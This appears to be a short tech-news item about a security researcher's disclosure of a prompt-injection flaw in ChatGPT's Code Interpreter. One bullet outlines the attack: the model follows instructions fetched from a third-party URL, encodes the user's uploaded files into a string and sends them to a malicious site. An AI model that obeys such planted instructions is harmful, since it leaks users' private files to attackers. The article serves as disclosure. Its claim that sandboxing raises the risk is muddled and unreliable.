ChatGPT’s code interpreter tool is prone to hacker attacks.



What you need to know

  • ChatGPT Plus members can now access a code interpreting tool with sophisticated coding capabilities, including writing Python code by leveraging AI capabilities and running it in a sandboxed environment.
  • A security expert has disclosed that the new feature potentially poses a significant security threat to users.
  • Running the code in a sandbox environment heightens the chances of hackers maliciously accessing your data.
  • The technique involves tricking ChatGPT into executing instructions from a third-party URL, prompting it to encode uploaded files into a string, and sending this information to a malicious site. 

For a while now, we’ve known ChatGPT can achieve incredible things and make work easier for users, from developing software in under 7 minutes to solving complex math problems and more. While it’s already possible to write code using the tool, OpenAI recently debuted a new Code Interpreter tool, making the process more seamless.

According to Tom’s Hardware and cybersecurity expert Johann Rehberger, the tool writes Python code by leveraging AI capabilities and even runs it in a sandboxed environment. And while this is an incredible feat, the sandboxed environment bit is a hornet’s nest bred with attackers. 

See more





Source link

Previous articleBlock sees 400% Bitcoin price surge over six years, expands crypto projects By Investing.com
Next articleGoogle Search Notes brings back humanity amid AI barrage